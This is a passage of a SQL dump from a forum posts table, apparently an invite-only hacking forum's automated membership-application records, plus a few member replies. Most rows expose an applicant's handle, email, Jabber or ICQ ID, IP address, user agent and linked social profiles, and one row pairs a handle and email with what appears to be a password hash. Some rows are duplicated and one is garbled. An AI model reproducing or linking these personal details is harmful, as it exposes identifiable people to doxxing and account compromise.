0, 0, 0),
(2000, 1690, 0, 'Invite', 2, '{$name}', 1410529363, '[SIZE=\'4\'][COLOR=\'Sienna\']certina[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 22222221\n[b]e-mail[/b]: certina@xru.ru\n[b]Info[/b]: LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://certina.prommag.ru | certina.prommag.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2001, 1691, 0, 'Invite', 2, '{$name}', 1410529372, '[SIZE=\'4\'][COLOR=\'Sienna\']certina[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 22222221\n[b]e-mail[/b]: certina@xru.ru\n[b]Info[/b]: LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://certina.prommag.ru | certina.prommag.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2002, 1692, 0, 'Invite', 2, '{$name}', 1410529380, '[SIZE=\'4\'][COLOR=\'Sienna\']certina[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 22222221\n[b]e-mail[/b]: certina@xru.ru\n[b]Info[/b]: LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://certina.prommag.ru | certina.prommag.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2003, 1693, 0, 'Invite', 2, '{$name}', 1410529396, '[SIZE=\'4\'][COLOR=\'Sienna\']certina[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 22222221\n[b]e-mail[/b]: -certina@xru.ru\n[b]Info[/b]: LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://certina.prommag.ru | certina.prommag.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2004, 1099, 1170, 'lumbricus', 39, '', 1410529929, 'ÿþчõüу òы уñрðûø ssl?', 1, 0, '', 0, 1, 0, 0, 0),
(2008, 1694, 0, 'Invite', 2, '{$name}', 1410541594, '[SIZE=\'4\'][COLOR=\'Sienna\']Sph3r3[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: minime2012@swissjabber.ch\n[b]e-mail[/b]: xor4ever@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 213.233.104.49\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forums.whirlpool.net.au/user/46007 | http://forums.whirlpool.net.au/user/46007 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2011, 1695, 0, 'Invite', 2, '{$name}', 1410553474, '[SIZE=\'4\'][COLOR=\'Sienna\']bd22[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: bd@uprod.biz\n[b]e-mail[/b]: n00ne@sinnlos-mail.de\n[b]Info[/b]: Malware enthusiast\r\nphp, js, as2/3, python, c/c++\r\n\r\nother forums username leave on request.\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.15.41.202\n[*][b]real ip[/b]: 31.15.41.202\n[*][b]User agent[/b]: Mozilla/5.0 (Linux; Android 4.4.2; SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.117 Mobile Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/bd22 | https://twitter.com/hashtag/bd22 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2013, 1696, 0, 'Invite', 2, '{$name}', 1410554211, '[SIZE=\'4\'][COLOR=\'Sienna\']Mike Richey[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: qqpoc@jabber.org\n[b]e-mail[/b]: qqpoc@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 4.58.28.225\n[*][b]real ip[/b]: 4.58.28.225\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/mikericheymsu | https://twitter.com/mikericheymsu \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2015, 1695, 2011, 'syslink', 13, '', 1410564285, 'added on jabber', 1, 0, '', 0, 1, 0, 0, 0),
(2016, 1648, 1919, 'w0rm', 1, '', 1410564341, 'add him here', 1, 0, '', 0, 1, 0, 0, 0),
(2020, 1698, 0, 'Invite', 2, '{$name}', 1410596999, '[SIZE=\'4\'][COLOR=\'Sienna\']moeintak[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: symroot@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.234.26.85\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.memrise.com/user/moeintak/ | http://www.memrise.com/user/moeintak/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2022, 1700, 0, 'Invite', 2, '{$name}', 1410621242, '[SIZE=\'4\'][COLOR=\'Sienna\']Evoo[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: cafc.404@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 36.85.135.211\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://evoo.biz | evoo.biz \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2023, 1701, 0, 'Invite', 2, '{$name}', 1410626021, '[SIZE=\'4\'][COLOR=\'Sienna\']kowalsky[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: george@zloy.im\n[b]e-mail[/b]: kowalsky@koszmail.pl\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 198.96.155.3\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/53696859@N07/ | https://www.flickr.com/photos/53696859@N07/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2024, 1702, 0, 'Invite', 2, '{$name}', 1410631321, '[SIZE=\'4\'][COLOR=\'Sienna\']Zulu[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: glockhead500@gmail.com\n[b]Info[/b]: I\'ve been on the scene for a while, and would just like to check out the site. I code in C++, and currently hold varies IT certs.\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 166.205.68.34\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://zulu.mk | zulu.mk \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2025, 1703, 0, 'Invite', 2, '{$name}', 1410638092, '[SIZE=\'4\'][COLOR=\'Sienna\']Spammeanddie[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: spammeanddie@msn.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 80.56.162.240\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2084.0 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://spammeanddie.blogspot.com | spammeanddie.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2026, 1704, 0, 'Invite', 2, '{$name}', 1410644725, '[SIZE=\'4\'][COLOR=\'Sienna\']Hedrek[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 627380\n[b]e-mail[/b]: intactdev@delhack.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.95.226.233\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.minecraftpvp.com/profile/Hedrek | http://www.minecraftpvp.com/profile/Hedrek \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2027, 1705, 0, 'Invite', 2, '{$name}', 1410644725, '[SIZE=\'4\'][COLOR=\'Sienna\']Hedrek[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 627380\n[b]e-mail[/b]: intactdev@delhack.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.95.226.233\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.minecraftpvp.com/profile/Hedrek | http://www.minecraftpvp.com/profile/Hedrek \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2028, 1706, 0, 'Invite', 2, '{$name}', 1410646206, '[SIZE=\'4\'][COLOR=\'Sienna\']cyberhawk[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: scot.michael40@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.203.67.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : cyberhawk : blackhawksecure@mail.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/id222846613 | http://vk.com/id222846613 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2029, 1707, 0, 'Invite', 2, '{$name}', 1410647677, '[SIZE=\'4\'][COLOR=\'Sienna\']Coscalle[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: coscalle@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 213.46.103.121\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] 